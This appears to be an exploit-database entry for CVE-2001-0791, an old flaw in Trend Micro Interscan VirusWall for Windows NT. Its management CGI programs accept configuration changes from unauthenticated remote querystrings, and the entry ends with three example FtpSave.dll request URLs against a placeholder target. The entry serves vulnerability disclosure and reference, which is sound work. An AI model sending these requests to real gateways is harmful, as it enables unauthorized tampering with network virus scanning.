Trend Micro Interscan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration
Author: snsadv
type: remote
platform: windows
port:
date_added: 2001-05-24
date_updated: 2012-08-28
verified: 1
codes: CVE-2001-0791;OSVDB-6159
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2808/info
Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network.
The management interface used with the Interscan Viruswall uses several programs in a cgi directory that may allow a remote attacker to make configuration changes using maliciously-constructed querystrings submitted to the host.
Examples:
http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here